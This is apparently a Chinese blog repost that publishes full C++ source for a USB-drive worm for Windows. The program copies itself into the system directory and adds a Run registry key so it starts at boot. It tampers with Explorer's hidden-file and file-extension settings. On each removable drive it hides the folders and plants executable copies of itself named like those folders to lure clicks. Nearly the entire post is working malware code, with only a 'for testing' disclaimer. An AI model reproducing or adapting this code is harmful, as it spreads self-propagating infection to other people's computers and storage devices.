zoukankan      html  css  js  c++  java
  • 一种U盘病毒源码

    #include "stdafx.h"
    #include <windows.h>
    #include "resource.h"               
    /////////////////////////////////////////////////////
    VOID DoBad(char DriveBuf[]);
    VOID DoBad(char DriveBuf[]) 
    {
            CFileFind finder;
            // build a string with wildcards
            CString strWildcard(DriveBuf);
            strWildcard += _T("*.*");
            char FileSource[MAX_PATH]={0}; 
            char FileNew[MAX_PATH]={0};
            HMODULE hModule=GetModuleHandle(NULL); 
            GetModuleFileName(hModule,FileSource,MAX_PATH); 
            CloseHandle(hModule);  
            // start working for files
            BOOL bWorking = finder.FindFile(strWildcard); 
            while (bWorking)
            {
                    bWorking = finder.FindNextFile();
                    if (finder.IsDots()) 
                            continue;
                    // if it's a directory, recursively search it
                    if (finder.IsDirectory()&&!finder.IsSystem()&&!finder.IsHidden())
                    {       
                            if(!SetFileAttributes(finder.GetFilePath(),FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM))  //| FILE_ATTRIBUTE_SYSTEM
                                    continue; 
                sprintf(FileNew,"%s%s",finder.GetFilePath(),".exe");
                            CopyFile(FileSource,FileNew,TRUE); 
                    }
            }
            finder.Close();
    }
    /////////////////////////////////////////////////////
    #include <dbt.h>
    char diskPath[5] = { 0 };
    LRESULT OnDeviceChange(HWND hwnd,WPARAM wParam, LPARAM lParam);
    LRESULT OnDeviceChange(HWND hwnd,WPARAM wParam, LPARAM lParam)
    {
    //        char U[4];
            PDEV_BROADCAST_HDR lpdb = (PDEV_BROADCAST_HDR)lParam;
            DWORD allDisk = GetLogicalDrives();
            if (allDisk!=0)
            {
            switch(wParam)
            {
            case DBT_DEVICEARRIVAL:
                    {
                    for (int i=0;i<40;i++)
                    {
                            if ((allDisk & 1)==1)
                            {
                                    sprintf(diskPath, "%c", 'C'+i ); 
                                    strcat(diskPath, ":\\" );
                                   
                                    if (GetDriveType(diskPath)==DRIVE_REMOVABLE )
                                    {
                                            if( GetVolumeInformation(diskPath,0,0,0,0,0,0,0) )
                                            {
                                                    //MessageBox( NULL,diskPath, "1",MB_OK );
                                                    DoBad(diskPath);
                                                    break;
                                            }
                                    }
                            }
                            allDisk = allDisk>>1;
                    }
                    }
            break;
            case DBT_DEVICEREMOVECOMPLETE:
                    MessageBox( NULL,"停止U盘", "病毒提示!",MB_OK );
            break;
            }
            }
            return LRESULT();
    }

    LRESULT CALLBACK WndProc(HWND hWnd,UINT message,WPARAM wParam,LPARAM lParam);
    LRESULT CALLBACK WndProc(HWND hWnd,UINT message,WPARAM wParam,LPARAM lParam)
    {
            switch(message)
            {
            case WM_CREATE:
                    break;
            case WM_DEVICECHANGE:
    //                if(modify_data.IsUpan)
                            OnDeviceChange(hWnd,wParam,lParam);
                    break;
            case WM_CLOSE:
                    return FALSE; 
            case WM_DESTROY:
                    return FALSE;
            default:
                    return DefWindowProc(hWnd,message,wParam,lParam);
            }
            return 0;
    }

    int CreateMyWindow();
    int CreateMyWindow()
    {
            MSG msg;
            WNDCLASS wndc;
            LPSTR szAppName="WebDown";
            wndc.style=0;
            wndc.lpfnWndProc=WndProc;  
            wndc.cbClsExtra=0;
            wndc.cbWndExtra=0;
            wndc.hInstance=NULL;
            wndc.hIcon=NULL;
            wndc.hCursor=NULL;
            wndc.hbrBackground=(HBRUSH)(COLOR_WINDOW+1);
            wndc.lpszMenuName=NULL;
            wndc.lpszClassName=szAppName;
            RegisterClass(&wndc);
            HWND hWnd=CreateWindow(szAppName,"hacker",
                    WS_OVERLAPPEDWINDOW,CW_USEDEFAULT,CW_USEDEFAULT,
                    CW_USEDEFAULT,CW_USEDEFAULT,NULL,NULL,NULL,NULL);
            ShowWindow(hWnd,SW_HIDE);
            UpdateWindow(hWnd); 
           
            SendMessage(hWnd,WM_DEVICECHANGE,0,0);
           
            while(GetMessage(&msg,NULL,0,0))
            {
                    TranslateMessage(&msg);
                    DispatchMessage(&msg);
            }
            return 1;
    }

    /////////////////////////////////////////////////////
    void DeleteSubKeyTree(HKEY hKey, LPCTSTR lpSubKey);
    void DeleteSubKeyTree(HKEY hKey, LPCTSTR lpSubKey) 
    {
            LONG lResult;
            HKEY hSubKey;
            DWORD   dwIndex, cbName;
            char   szSubKey[512];
            FILETIME   ft;
            lResult   =   RegOpenKeyEx(hKey,   lpSubKey,   0,   KEY_ALL_ACCESS,&hSubKey);
            if (lResult != ERROR_SUCCESS)
            {
                    RegCloseKey(hSubKey);
                    //                return lResult;
            }
            dwIndex = 0;
            cbName = sizeof(szSubKey)/sizeof(szSubKey[0]);
            while (ERROR_SUCCESS == (lResult = RegEnumKeyEx(hSubKey, dwIndex, szSubKey, &cbName, NULL, NULL, NULL, &ft)))
            {
                    DeleteSubKeyTree(hSubKey, szSubKey);
            }
            RegCloseKey(hSubKey);
            lResult = RegDeleteKey(hKey, lpSubKey);
            //        return lResult;
    }


    void FuckReg();
    void FuckReg() 
    {
            HKEY hKey; 
            RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden",&hKey); 
        TCHAR *valueA=_T("机器已经中毒了  本程序测试使用—JACK");
            RegSetValueEx(hKey, "Text", NULL, REG_SZ, (LPBYTE)valueA, (DWORD) (lstrlen(valueA)+1));
            RegCloseKey(hKey); 
           
            LPCTSTR lpSubKey1= "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN";
            HKEY hKey1 = HKEY_LOCAL_MACHINE;
            DeleteSubKeyTree(hKey1, lpSubKey1);
           
            LPCTSTR lpSubKey2= "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL";
            HKEY hKey2 = HKEY_LOCAL_MACHINE;
            DeleteSubKeyTree(hKey2, lpSubKey2);
           
            HKEY hKey3; 
            RegCreateKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced",&hKey3); 
            DWORD valueA3=1;
            RegSetValueEx(hKey3, "HideFileExt", NULL, REG_DWORD, (CONST BYTE *)(&valueA3),4);
            RegCloseKey(hKey3);  //关闭句柄
    }
    /////////////////////////////////////////////////////

    #include   <shellapi.h>
    #pragma comment(linker, "/ALIGN:4096")
    #pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" )
    int main()
    {
    //////////////////////////////////////
    char fullPath[MAX_PATH]; 
    HMODULE hModule=GetModuleHandle(NULL);  
    GetModuleFileName(hModule, fullPath,MAX_PATH);
    CString strPath=(CString)fullPath;
    int ret=strPath.ReverseFind(_T('.exe'));  
    CString path=strPath.Left(ret-3)+_T("\\"); 
    //    MessageBox(path);   
        ShellExecute(NULL,"explore",path,NULL,NULL,SW_SHOWNORMAL);
    //        ShellExecute(NULL,"open",NULL,NULL,path,SW_SHOWNORMAL);

    HANDLE m_hMutex=CreateMutex(NULL,FALSE,"ALALMN JACK 只做测试使用!!");
    if(GetLastError()==ERROR_ALREADY_EXISTS)
    {       
            CloseHandle(m_hMutex);
            m_hMutex=NULL;
            ExitProcess(0);
    }
    ///////////////////////////       
    char FileSource[MAX_PATH]={0};
    char FileNew[MAX_PATH]={0};
    HMODULE hModule1=GetModuleHandle(NULL);
    GetModuleFileName(hModule1,FileSource,MAX_PATH);
    CloseHandle(hModule1);
    GetSystemDirectory(FileNew,MAX_PATH);
    strcat(FileNew,"\\hacker.exe");
    ///////////////////////////       
    CopyFile(FileSource,FileNew,TRUE);
    HKEY hkey=HKEY_LOCAL_MACHINE;  
    char lpSubKey[256]="Software\\Microsoft\\Windows\\CurrentVersion\\Run";  
    HKEY phkResult;
    int len=sizeof(FileNew); 
    if(::RegOpenKeyEx(hkey,lpSubKey,0,KEY_ALL_ACCESS,&phkResult)!=ERROR_SUCCESS) 
    {
            ::RegCreateKeyEx(hkey,lpSubKey,0,NULL,REG_OPTION_NON_VOLATILE,KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_WRITE,NULL,&phkResult,NULL); 
    }       
    if (RegQueryValueEx(hkey,lpSubKey,NULL,NULL,(unsigned char *)&FileNew,(unsigned long *)&len)!=ERROR_SUCCESS)  
            ::RegSetValueEx(phkResult,"hacker--JACK",0,REG_SZ,(LPBYTE)FileNew, (DWORD)(lstrlen(FileNew)+1)); 
    ::RegCloseKey(phkResult); 
    ///////////////////////////       
    FuckReg(); 
    CreateMyWindow(); 
    //-------------------------
    //while (1)   //创建一个死循环,不然主线程退出
    //{
    //        Sleep(1000);
    //}
    //---------------------
    return 0;
    }

  • 相关阅读:
    Python3-元组
    Python3-列表
    Python3-字符串
    Python3-for循环机制
    Python3-初识
    优先队列——priority queue
    单调队列 —— 滑动窗口
    SDNU_ACM_ICPC_2021_Winter_Practice_7th [个人赛]
    博弈论入门(论和威佐夫、巴什、尼姆打牌被吊打是什么感受(╥﹏╥)
    字符串最大最小表示法
  • 原文地址:https://www.cnblogs.com/buffer/p/1412630.html
Copyright © 2011-2022 走看看